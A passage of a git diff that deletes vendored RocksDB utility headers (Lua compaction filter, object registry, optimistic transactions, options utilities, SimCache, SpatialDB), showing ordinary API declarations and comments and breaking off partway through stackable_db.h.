-  //   -- Examples
-  //     -- a filter that keeps all key-value pairs
-  //     function Filter(level, key, existing_value)
-  //       return false, false, ""
-  //     end
-  //
-  //     -- a filter that keeps all keys and change their values to "Rocks"
-  //     function Filter(level, key, existing_value)
-  //       return false, true, "Rocks"
-  //     end
-
-  std::string lua_script;
-
-  // If set to true, then existing_value will not be passed to the Filter
-  // function, and the Filter function only needs to return a single boolean
-  // flag indicating whether to filter out this key or not.
-  //
-  //   function Filter(level, key)
-  //     ...
-  //     return is_filtered
-  //   end
-  bool ignore_value = false;
-
-  // A boolean flag to determine whether to ignore snapshots.
-  bool ignore_snapshots = false;
-
-  // When specified a non-null pointer, the first "error_limit_per_filter"
-  // errors of each CompactionFilter that is lua related will be included
-  // in this log.
-  std::shared_ptr<Logger> error_log;
-
-  // The number of errors per CompactionFilter will be printed
-  // to error_log.
-  int error_limit_per_filter = 1;
-
-  // A string to luaL_reg array map that allows the Lua CompactionFilter
-  // to use custom C library.  The string will be used as the library
-  // name in Lua.
-  std::vector<std::shared_ptr<RocksLuaCustomLibrary>> libraries;
-
-  ///////////////////////////////////////////////////////////////////////////
-  //  NOT YET SUPPORTED
-  // The name of the Lua function in "lua_script" that implements
-  // CompactionFilter::FilterMergeOperand().  The function must take
-  // three input arguments (integer, string, string), which map to "level",
-  // "key", and "operand" passed from the RocksDB.  In addition, the
-  // function must return a single boolean value, indicating whether
-  // to filter the input key / operand.
-  //
-  // DEFAULT:  the default implementation always returns false.
-  // @see CompactionFilter::FilterMergeOperand
-};
-
-class RocksLuaCompactionFilterFactory : public CompactionFilterFactory {
- public:
-  explicit RocksLuaCompactionFilterFactory(
-      const RocksLuaCompactionFilterOptions opt);
-
-  virtual ~RocksLuaCompactionFilterFactory() {}
-
-  std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override;
-
-  // Change the Lua script so that the next compaction after this
-  // function call will use the new Lua script.
-  void SetScript(const std::string& new_script);
-
-  // Obtain the current Lua script
-  std::string GetScript();
-
-  const char* Name() const override;
-
- private:
-  RocksLuaCompactionFilterOptions opt_;
-  std::string name_;
-  // A lock to protect "opt_" to make it dynamically changeable.
-  std::mutex opt_mutex_;
-};
-
-// A wrapper class that invokes Lua script to perform CompactionFilter
-// functions.
-class RocksLuaCompactionFilter : public rocksdb::CompactionFilter {
- public:
-  explicit RocksLuaCompactionFilter(const RocksLuaCompactionFilterOptions& opt)
-      : options_(opt),
-        lua_state_wrapper_(opt.lua_script, opt.libraries),
-        error_count_(0),
-        name_("") {}
-
-  virtual bool Filter(int level, const Slice& key, const Slice& existing_value,
-                      std::string* new_value,
-                      bool* value_changed) const override;
-  // Not yet supported
-  virtual bool FilterMergeOperand(int level, const Slice& key,
-                                  const Slice& operand) const override {
-    return false;
-  }
-  virtual bool IgnoreSnapshots() const override;
-  virtual const char* Name() const override;
-
- protected:
-  void LogLuaError(const char* format, ...) const;
-
-  RocksLuaCompactionFilterOptions options_;
-  LuaStateWrapper lua_state_wrapper_;
-  mutable int error_count_;
-  mutable std::string name_;
-};
-
-}  // namespace lua
-}  // namespace rocksdb
-#endif  // defined(LUA) && !defined(ROCKSDB_LITE)
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/lua/rocks_lua_custom_library.h b/thirdparty/rocksdb/include/rocksdb/utilities/lua/rocks_lua_custom_library.h
deleted file mode 100644
index 3ca8b32..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/lua/rocks_lua_custom_library.h
+++ /dev/null
@@ -1,43 +0,0 @@
-//  Copyright (c) 2016, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifdef LUA
-
-// lua headers
-extern "C" {
-#include <lauxlib.h>
-#include <lua.h>
-#include <lualib.h>
-}
-
-namespace rocksdb {
-namespace lua {
-// A class that used to define custom C Library that is callable
-// from Lua script
-class RocksLuaCustomLibrary {
- public:
-  virtual ~RocksLuaCustomLibrary() {}
-  // The name of the C library.  This name will also be used as the table
-  // (namespace) in Lua that contains the C library.
-  virtual const char* Name() const = 0;
-
-  // Returns a "static const struct luaL_Reg[]", which includes a list of
-  // C functions.  Note that the last entry of this static array must be
-  // {nullptr, nullptr} as required by Lua.
-  //
-  // More details about how to implement Lua C libraries can be found
-  // in the official Lua document http://www.lua.org/pil/26.2.html
-  virtual const struct luaL_Reg* Lib() const = 0;
-
-  // A function that will be called right after the library has been created
-  // and pushed on the top of the lua_State.  This custom setup function
-  // allows developers to put additional table or constant values inside
-  // the same table / namespace.
-  virtual void CustomSetup(lua_State* L) const {}
-};
-}  // namespace lua
-}  // namespace rocksdb
-#endif  // LUA
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/lua/rocks_lua_util.h b/thirdparty/rocksdb/include/rocksdb/utilities/lua/rocks_lua_util.h
deleted file mode 100644
index 36b007c..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/lua/rocks_lua_util.h
+++ /dev/null
@@ -1,55 +0,0 @@
-//  Copyright (c) 2016, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-// lua headers
-extern "C" {
-#include <lauxlib.h>
-#include <lua.h>
-#include <lualib.h>
-}
-
-#ifdef LUA
-#include <string>
-#include <vector>
-
-#include "rocksdb/utilities/lua/rocks_lua_custom_library.h"
-
-namespace rocksdb {
-namespace lua {
-class LuaStateWrapper {
- public:
-  explicit LuaStateWrapper(const std::string& lua_script) {
-    lua_state_ = luaL_newstate();
-    Init(lua_script, {});
-  }
-  LuaStateWrapper(
-      const std::string& lua_script,
-      const std::vector<std::shared_ptr<RocksLuaCustomLibrary>>& libraries) {
-    lua_state_ = luaL_newstate();
-    Init(lua_script, libraries);
-  }
-  lua_State* GetLuaState() const { return lua_state_; }
-  ~LuaStateWrapper() { lua_close(lua_state_); }
-
- private:
-  void Init(
-      const std::string& lua_script,
-      const std::vector<std::shared_ptr<RocksLuaCustomLibrary>>& libraries) {
-    if (lua_state_) {
-      luaL_openlibs(lua_state_);
-      for (const auto& library : libraries) {
-        luaL_openlib(lua_state_, library->Name(), library->Lib(), 0);
-        library->CustomSetup(lua_state_);
-      }
-      luaL_dostring(lua_state_, lua_script.c_str());
-    }
-  }
-
-  lua_State* lua_state_;
-};
-}  // namespace lua
-}  // namespace rocksdb
-#endif  // LUA
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/memory_util.h b/thirdparty/rocksdb/include/rocksdb/utilities/memory_util.h
deleted file mode 100644
index c612890..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/memory_util.h
+++ /dev/null
@@ -1,50 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#pragma once
-
-#include <map>
-#include <string>
-#include <unordered_set>
-#include <vector>
-
-#include "rocksdb/cache.h"
-#include "rocksdb/db.h"
-
-namespace rocksdb {
-
-// Returns the current memory usage of the specified DB instances.
-class MemoryUtil {
- public:
-  enum UsageType : int {
-    // Memory usage of all the mem-tables.
-    kMemTableTotal = 0,
-    // Memory usage of those un-flushed mem-tables.
-    kMemTableUnFlushed = 1,
-    // Memory usage of all the table readers.
-    kTableReadersTotal = 2,
-    // Memory usage by Cache.
-    kCacheTotal = 3,
-    kNumUsageTypes = 4
-  };
-
-  // Returns the approximate memory usage of different types in the input
-  // list of DBs and Cache set.  For instance, in the output map
-  // usage_by_type, usage_by_type[kMemTableTotal] will store the memory
-  // usage of all the mem-tables from all the input rocksdb instances.
-  //
-  // Note that for memory usage inside Cache class, we will
-  // only report the usage of the input "cache_set" without
-  // including those Cache usage inside the input list "dbs"
-  // of DBs.
-  static Status GetApproximateMemoryUsageByType(
-      const std::vector<DB*>& dbs,
-      const std::unordered_set<const Cache*> cache_set,
-      std::map<MemoryUtil::UsageType, uint64_t>* usage_by_type);
-};
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/object_registry.h b/thirdparty/rocksdb/include/rocksdb/utilities/object_registry.h
deleted file mode 100644
index b046ba7..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/object_registry.h
+++ /dev/null
@@ -1,90 +0,0 @@
-// Copyright (c) 2016-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <functional>
-#include <memory>
-#include <regex>
-#include <string>
-#include <vector>
-
-#include "rocksdb/env.h"
-
-namespace rocksdb {
-
-// Creates a new T using the factory function that was registered with a pattern
-// that matches the provided "target" string according to std::regex_match.
-//
-// If no registered functions match, returns nullptr. If multiple functions
-// match, the factory function used is unspecified.
-//
-// Populates res_guard with result pointer if caller is granted ownership.
-template <typename T>
-T* NewCustomObject(const std::string& target, std::unique_ptr<T>* res_guard);
-
-// Returns a new T when called with a string. Populates the unique_ptr argument
-// if granting ownership to caller.
-template <typename T>
-using FactoryFunc = std::function<T*(const std::string&, std::unique_ptr<T>*)>;
-
-// To register a factory function for a type T, initialize a Registrar<T> object
-// with static storage duration. For example:
-//
-//   static Registrar<Env> hdfs_reg("hdfs://.*", &CreateHdfsEnv);
-//
-// Then, calling NewCustomObject<Env>("hdfs://some_path", ...) will match the
-// regex provided above, so it returns the result of invoking CreateHdfsEnv.
-template <typename T>
-class Registrar {
- public:
-  explicit Registrar(std::string pattern, FactoryFunc<T> factory);
-};
-
-// Implementation details follow.
-
-namespace internal {
-
-template <typename T>
-struct RegistryEntry {
-  std::regex pattern;
-  FactoryFunc<T> factory;
-};
-
-template <typename T>
-struct Registry {
-  static Registry* Get() {
-    static Registry<T> instance;
-    return &instance;
-  }
-  std::vector<RegistryEntry<T>> entries;
-
- private:
-  Registry() = default;
-};
-
-}  // namespace internal
-
-template <typename T>
-T* NewCustomObject(const std::string& target, std::unique_ptr<T>* res_guard) {
-  res_guard->reset();
-  for (const auto& entry : internal::Registry<T>::Get()->entries) {
-    if (std::regex_match(target, entry.pattern)) {
-      return entry.factory(target, res_guard);
-    }
-  }
-  return nullptr;
-}
-
-template <typename T>
-Registrar<T>::Registrar(std::string pattern, FactoryFunc<T> factory) {
-  internal::Registry<T>::Get()->entries.emplace_back(internal::RegistryEntry<T>{
-      std::regex(std::move(pattern)), std::move(factory)});
-}
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/optimistic_transaction_db.h b/thirdparty/rocksdb/include/rocksdb/utilities/optimistic_transaction_db.h
deleted file mode 100644
index 02917ff..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/optimistic_transaction_db.h
+++ /dev/null
@@ -1,76 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include <vector>
-
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-
-namespace rocksdb {
-
-class Transaction;
-
-// Database with Transaction support.
-//
-// See optimistic_transaction.h and examples/transaction_example.cc
-
-// Options to use when starting an Optimistic Transaction
-struct OptimisticTransactionOptions {
-  // Setting set_snapshot=true is the same as calling SetSnapshot().
-  bool set_snapshot = false;
-
-  // Should be set if the DB has a non-default comparator.
-  // See comment in WriteBatchWithIndex constructor.
-  const Comparator* cmp = BytewiseComparator();
-};
-
-class OptimisticTransactionDB {
- public:
-  // Open an OptimisticTransactionDB similar to DB::Open().
-  static Status Open(const Options& options, const std::string& dbname,
-                     OptimisticTransactionDB** dbptr);
-
-  static Status Open(const DBOptions& db_options, const std::string& dbname,
-                     const std::vector<ColumnFamilyDescriptor>& column_families,
-                     std::vector<ColumnFamilyHandle*>* handles,
-                     OptimisticTransactionDB** dbptr);
-
-  virtual ~OptimisticTransactionDB() {}
-
-  // Starts a new Transaction.
-  //
-  // Caller is responsible for deleting the returned transaction when no
-  // longer needed.
-  //
-  // If old_txn is not null, BeginTransaction will reuse this Transaction
-  // handle instead of allocating a new one.  This is an optimization to avoid
-  // extra allocations when repeatedly creating transactions.
-  virtual Transaction* BeginTransaction(
-      const WriteOptions& write_options,
-      const OptimisticTransactionOptions& txn_options =
-          OptimisticTransactionOptions(),
-      Transaction* old_txn = nullptr) = 0;
-
-  // Return the underlying Database that was opened
-  virtual DB* GetBaseDB() = 0;
-
- protected:
-  // To Create an OptimisticTransactionDB, call Open()
-  explicit OptimisticTransactionDB(DB* db) {}
-  OptimisticTransactionDB() {}
-
- private:
-  // No copying allowed
-  OptimisticTransactionDB(const OptimisticTransactionDB&);
-  void operator=(const OptimisticTransactionDB&);
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/option_change_migration.h b/thirdparty/rocksdb/include/rocksdb/utilities/option_change_migration.h
deleted file mode 100644
index 81f674c..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/option_change_migration.h
+++ /dev/null
@@ -1,19 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <string>
-#include "rocksdb/options.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-// Try to migrate DB created with old_opts to be use new_opts.
-// Multiple column families is not supported.
-// It is best-effort. No guarantee to succeed.
-// A full compaction may be executed.
-Status OptionChangeMigration(std::string dbname, const Options& old_opts,
-                             const Options& new_opts);
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/options_util.h b/thirdparty/rocksdb/include/rocksdb/utilities/options_util.h
deleted file mode 100644
index d02c574..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/options_util.h
+++ /dev/null
@@ -1,93 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-// This file contains utility functions for RocksDB Options.
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include <vector>
-
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-// Constructs the DBOptions and ColumnFamilyDescriptors by loading the
-// latest RocksDB options file stored in the specified rocksdb database.
-//
-// Note that the all the pointer options (except table_factory, which will
-// be described in more details below) will be initialized with the default
-// values.  Developers can further initialize them after this function call.
-// Below is an example list of pointer options which will be initialized
-//
-// * env
-// * memtable_factory
-// * compaction_filter_factory
-// * prefix_extractor
-// * comparator
-// * merge_operator
-// * compaction_filter
-//
-// For table_factory, this function further supports deserializing
-// BlockBasedTableFactory and its BlockBasedTableOptions except the
-// pointer options of BlockBasedTableOptions (flush_block_policy_factory,
-// block_cache, and block_cache_compressed), which will be initialized with
-// default values.  Developers can further specify these three options by
-// casting the return value of TableFactoroy::GetOptions() to
-// BlockBasedTableOptions and making necessary changes.
-//
-// ignore_unknown_options can be set to true if you want to ignore options
-// that are from a newer version of the db, esentially for forward
-// compatibility.
-//
-// examples/options_file_example.cc demonstrates how to use this function
-// to open a RocksDB instance.
-//
-// @return the function returns an OK status when it went successfully.  If
-//     the specified "dbpath" does not contain any option file, then a
-//     Status::NotFound will be returned.  A return value other than
-//     Status::OK or Status::NotFound indicates there're some error related
-//     to the options file itself.
-//
-// @see LoadOptionsFromFile
-Status LoadLatestOptions(const std::string& dbpath, Env* env,
-                         DBOptions* db_options,
-                         std::vector<ColumnFamilyDescriptor>* cf_descs,
-                         bool ignore_unknown_options = false);
-
-// Similar to LoadLatestOptions, this function constructs the DBOptions
-// and ColumnFamilyDescriptors based on the specified RocksDB Options file.
-//
-// @see LoadLatestOptions
-Status LoadOptionsFromFile(const std::string& options_file_name, Env* env,
-                           DBOptions* db_options,
-                           std::vector<ColumnFamilyDescriptor>* cf_descs,
-                           bool ignore_unknown_options = false);
-
-// Returns the latest options file name under the specified db path.
-Status GetLatestOptionsFileName(const std::string& dbpath, Env* env,
-                                std::string* options_file_name);
-
-// Returns Status::OK if the input DBOptions and ColumnFamilyDescriptors
-// are compatible with the latest options stored in the specified DB path.
-//
-// If the return status is non-ok, it means the specified RocksDB instance
-// might not be correctly opened with the input set of options.  Currently,
-// changing one of the following options will fail the compatibility check:
-//
-// * comparator
-// * prefix_extractor
-// * table_factory
-// * merge_operator
-Status CheckOptionsCompatibility(
-    const std::string& dbpath, Env* env, const DBOptions& db_options,
-    const std::vector<ColumnFamilyDescriptor>& cf_descs,
-    bool ignore_unknown_options = false);
-
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/sim_cache.h b/thirdparty/rocksdb/include/rocksdb/utilities/sim_cache.h
deleted file mode 100644
index f29fd5e..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/sim_cache.h
+++ /dev/null
@@ -1,89 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <stdint.h>
-#include <memory>
-#include <string>
-#include "rocksdb/cache.h"
-#include "rocksdb/env.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-class SimCache;
-
-// For instrumentation purpose, use NewSimCache instead of NewLRUCache API
-// NewSimCache is a wrapper function returning a SimCache instance that can
-// have additional interface provided in Simcache class besides Cache interface
-// to predict block cache hit rate without actually allocating the memory. It
-// can help users tune their current block cache size, and determine how
-// efficient they are using the memory.
-//
-// Since GetSimCapacity() returns the capacity for simulutation, it differs from
-// actual memory usage, which can be estimated as:
-// sim_capacity * entry_size / (entry_size + block_size),
-// where 76 <= entry_size <= 104,
-// BlockBasedTableOptions.block_size = 4096 by default but is configurable,
-// Therefore, generally the actual memory overhead of SimCache is Less than
-// sim_capacity * 2%
-extern std::shared_ptr<SimCache> NewSimCache(std::shared_ptr<Cache> cache,
-                                             size_t sim_capacity,
-                                             int num_shard_bits);
-
-class SimCache : public Cache {
- public:
-  SimCache() {}
-
-  ~SimCache() override {}
-
-  const char* Name() const override { return "SimCache"; }
-
-  // returns the maximum configured capacity of the simcache for simulation
-  virtual size_t GetSimCapacity() const = 0;
-
-  // simcache doesn't provide internal handler reference to user, so always
-  // PinnedUsage = 0 and the behavior will be not exactly consistent the
-  // with real cache.
-  // returns the memory size for the entries residing in the simcache.
-  virtual size_t GetSimUsage() const = 0;
-
-  // sets the maximum configured capacity of the simcache. When the new
-  // capacity is less than the old capacity and the existing usage is
-  // greater than new capacity, the implementation will purge old entries
-  // to fit new capapicty.
-  virtual void SetSimCapacity(size_t capacity) = 0;
-
-  // returns the lookup times of simcache
-  virtual uint64_t get_miss_counter() const = 0;
-  // returns the hit times of simcache
-  virtual uint64_t get_hit_counter() const = 0;
-  // reset the lookup and hit counters
-  virtual void reset_counter() = 0;
-  // String representation of the statistics of the simcache
-  virtual std::string ToString() const = 0;
-
-  // Start storing logs of the cache activity (Add/Lookup) into
-  // a file located at activity_log_file, max_logging_size option can be used to
-  // stop logging to the file automatically after reaching a specific size in
-  // bytes, a values of 0 disable this feature
-  virtual Status StartActivityLogging(const std::string& activity_log_file,
-                                      Env* env, uint64_t max_logging_size = 0) = 0;
-
-  // Stop cache activity logging if any
-  virtual void StopActivityLogging() = 0;
-
-  // Status of cache logging happening in background
-  virtual Status GetActivityLoggingStatus() = 0;
-
- private:
-  SimCache(const SimCache&);
-  SimCache& operator=(const SimCache&);
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/spatial_db.h b/thirdparty/rocksdb/include/rocksdb/utilities/spatial_db.h
deleted file mode 100644
index 477b77c..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/spatial_db.h
+++ /dev/null
@@ -1,261 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include <vector>
-
-#include "rocksdb/db.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/utilities/stackable_db.h"
-
-namespace rocksdb {
-namespace spatial {
-
-// NOTE: SpatialDB is experimental and we might change its API without warning.
-// Please talk to us before developing against SpatialDB API.
-//
-// SpatialDB is a support for spatial indexes built on top of RocksDB.
-// When creating a new SpatialDB, clients specifies a list of spatial indexes to
-// build on their data. Each spatial index is defined by the area and
-// granularity. If you're storing map data, different spatial index
-// granularities can be used for different zoom levels.
-//
-// Each element inserted into SpatialDB has:
-// * a bounding box, which determines how will the element be indexed
-// * string blob, which will usually be WKB representation of the polygon
-// (http://en.wikipedia.org/wiki/Well-known_text)
-// * feature set, which is a map of key-value pairs, where value can be null,
-// int, double, bool, string
-// * a list of indexes to insert the element in
-//
-// Each query is executed on a single spatial index. Query guarantees that it
-// will return all elements intersecting the specified bounding box, but it
-// might also return some extra non-intersecting elements.
-
-// Variant is a class that can be many things: null, bool, int, double or string
-// It is used to store different value types in FeatureSet (see below)
-struct Variant {
-  // Don't change the values here, they are persisted on disk
-  enum Type {
-    kNull = 0x0,
-    kBool = 0x1,
-    kInt = 0x2,
-    kDouble = 0x3,
-    kString = 0x4,
-  };
-
-  Variant() : type_(kNull) {}
-  /* implicit */ Variant(bool b) : type_(kBool) { data_.b = b; }
-  /* implicit */ Variant(uint64_t i) : type_(kInt) { data_.i = i; }
-  /* implicit */ Variant(double d) : type_(kDouble) { data_.d = d; }
-  /* implicit */ Variant(const std::string& s) : type_(kString) {
-    new (&data_.s) std::string(s);
-  }
-
-  Variant(const Variant& v) : type_(v.type_) { Init(v, data_); }
-
-  Variant& operator=(const Variant& v);
-
-  Variant(Variant&& rhs) : type_(kNull) { *this = std::move(rhs); }
-
-  Variant& operator=(Variant&& v);
-
-  ~Variant() { Destroy(type_, data_); }
-
-  Type type() const { return type_; }
-  bool get_bool() const { return data_.b; }
-  uint64_t get_int() const { return data_.i; }
-  double get_double() const { return data_.d; }
-  const std::string& get_string() const { return *GetStringPtr(data_); }
-
-  bool operator==(const Variant& other) const;
-  bool operator!=(const Variant& other) const { return !(*this == other); }
-
- private:
-  Type type_;
-
-  union Data {
-    bool b;
-    uint64_t i;
-    double d;
-    // Current version of MS compiler not C++11 compliant so can not put
-    // std::string
-    // however, even then we still need the rest of the maintenance.
-    char s[sizeof(std::string)];
-  } data_;
-
-  // Avoid type_punned aliasing problem
-  static std::string* GetStringPtr(Data& d) {
-    void* p = d.s;
-    return reinterpret_cast<std::string*>(p);
-  }
-
-  static const std::string* GetStringPtr(const Data& d) {
-    const void* p = d.s;
-    return reinterpret_cast<const std::string*>(p);
-  }
-
-  static void Init(const Variant&, Data&);
-
-  static void Destroy(Type t, Data& d) {
-    if (t == kString) {
-      using std::string;
-      GetStringPtr(d)->~string();
-    }
-  }
-};
-
-// FeatureSet is a map of key-value pairs. One feature set is associated with
-// each element in SpatialDB. It can be used to add rich data about the element.
-class FeatureSet {
- private:
-  typedef std::unordered_map<std::string, Variant> map;
-
- public:
-  class iterator {
-   public:
-    /* implicit */ iterator(const map::const_iterator itr) : itr_(itr) {}
-    iterator& operator++() {
-      ++itr_;
-      return *this;
-    }
-    bool operator!=(const iterator& other) { return itr_ != other.itr_; }
-    bool operator==(const iterator& other) { return itr_ == other.itr_; }
-    map::value_type operator*() { return *itr_; }
-
-   private:
-    map::const_iterator itr_;
-  };
-  FeatureSet() = default;
-
-  FeatureSet* Set(const std::string& key, const Variant& value);
-  bool Contains(const std::string& key) const;
-  // REQUIRES: Contains(key)
-  const Variant& Get(const std::string& key) const;
-  iterator Find(const std::string& key) const;
-
-  iterator begin() const { return map_.begin(); }
-  iterator end() const { return map_.end(); }
-
-  void Clear();
-  size_t Size() const { return map_.size(); }
-
-  void Serialize(std::string* output) const;
-  // REQUIRED: empty FeatureSet
-  bool Deserialize(const Slice& input);
-
-  std::string DebugString() const;
-
- private:
-  map map_;
-};
-
-// BoundingBox is a helper structure for defining rectangles representing
-// bounding boxes of spatial elements.
-template <typename T>
-struct BoundingBox {
-  T min_x, min_y, max_x, max_y;
-  BoundingBox() = default;
-  BoundingBox(T _min_x, T _min_y, T _max_x, T _max_y)
-      : min_x(_min_x), min_y(_min_y), max_x(_max_x), max_y(_max_y) {}
-
-  bool Intersects(const BoundingBox<T>& a) const {
-    return !(min_x > a.max_x || min_y > a.max_y || a.min_x > max_x ||
-             a.min_y > max_y);
-  }
-};
-
-struct SpatialDBOptions {
-  uint64_t cache_size = 1 * 1024 * 1024 * 1024LL;  // 1GB
-  int num_threads = 16;
-  bool bulk_load = true;
-};
-
-// Cursor is used to return data from the query to the client. To get all the
-// data from the query, just call Next() while Valid() is true
-class Cursor {
- public:
-  Cursor() = default;
-  virtual ~Cursor() {}
-
-  virtual bool Valid() const = 0;
-  // REQUIRES: Valid()
-  virtual void Next() = 0;
-
-  // Lifetime of the underlying storage until the next call to Next()
-  // REQUIRES: Valid()
-  virtual const Slice blob() = 0;
-  // Lifetime of the underlying storage until the next call to Next()
-  // REQUIRES: Valid()
-  virtual const FeatureSet& feature_set() = 0;
-
-  virtual Status status() const = 0;
-
- private:
-  // No copying allowed
-  Cursor(const Cursor&);
-  void operator=(const Cursor&);
-};
-
-// SpatialIndexOptions defines a spatial index that will be built on the data
-struct SpatialIndexOptions {
-  // Spatial indexes are referenced by names
-  std::string name;
-  // An area that is indexed. If the element is not intersecting with spatial
-  // index's bbox, it will not be inserted into the index
-  BoundingBox<double> bbox;
-  // tile_bits control the granularity of the spatial index. Each dimension of
-  // the bbox will be split into (1 << tile_bits) tiles, so there will be a
-  // total of (1 << tile_bits)^2 tiles. It is recommended to configure a size of
-  // each  tile to be approximately the size of the query on that spatial index
-  uint32_t tile_bits;
-  SpatialIndexOptions() {}
-  SpatialIndexOptions(const std::string& _name,
-                      const BoundingBox<double>& _bbox, uint32_t _tile_bits)
-      : name(_name), bbox(_bbox), tile_bits(_tile_bits) {}
-};
-
-class SpatialDB : public StackableDB {
- public:
-  // Creates the SpatialDB with specified list of indexes.
-  // REQUIRED: db doesn't exist
-  static Status Create(const SpatialDBOptions& options, const std::string& name,
-                       const std::vector<SpatialIndexOptions>& spatial_indexes);
-
-  // Open the existing SpatialDB.  The resulting db object will be returned
-  // through db parameter.
-  // REQUIRED: db was created using SpatialDB::Create
-  static Status Open(const SpatialDBOptions& options, const std::string& name,
-                     SpatialDB** db, bool read_only = false);
-
-  explicit SpatialDB(DB* db) : StackableDB(db) {}
-
-  // Insert the element into the DB. Element will be inserted into specified
-  // spatial_indexes, based on specified bbox.
-  // REQUIRES: spatial_indexes.size() > 0
-  virtual Status Insert(const WriteOptions& write_options,
-                        const BoundingBox<double>& bbox, const Slice& blob,
-                        const FeatureSet& feature_set,
-                        const std::vector<std::string>& spatial_indexes) = 0;
-
-  // Calling Compact() after inserting a bunch of elements should speed up
-  // reading. This is especially useful if you use SpatialDBOptions::bulk_load
-  // Num threads determines how many threads we'll use for compactions. Setting
-  // this to bigger number will use more IO and CPU, but finish faster
-  virtual Status Compact(int num_threads = 1) = 0;
-
-  // Query the specified spatial_index. Query will return all elements that
-  // intersect bbox, but it may also return some extra elements.
-  virtual Cursor* Query(const ReadOptions& read_options,
-                        const BoundingBox<double>& bbox,
-                        const std::string& spatial_index) = 0;
-};
-
-}  // namespace spatial
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/stackable_db.h b/thirdparty/rocksdb/include/rocksdb/utilities/stackable_db.h
deleted file mode 100644
index 991de90..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/stackable_db.h
+++ /dev/null
@@ -1,374 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <map>
-#include <string>
-#include "rocksdb/db.h"
-
-#ifdef _WIN32
-// Windows API macro interference
-#undef DeleteFile
-#endif
-
-
-namespace rocksdb {
-
-// This class contains APIs to stack rocksdb wrappers.Eg. Stack TTL over base d
-class StackableDB : public DB {
- public:
-  // StackableDB is the owner of db now!
-  explicit StackableDB(DB* db) : db_(db) {}
-
-  ~StackableDB() {
-    delete db_;
-  }
-
-  virtual DB* GetBaseDB() {
-    return db_;
-  }
-
-  virtual DB* GetRootDB() override { return db_->GetRootDB(); }
-
-  virtual Status CreateColumnFamily(const ColumnFamilyOptions& options,
-                                    const std::string& column_family_name,
-                                    ColumnFamilyHandle** handle) override {
-    return db_->CreateColumnFamily(options, column_family_name, handle);
-  }
-
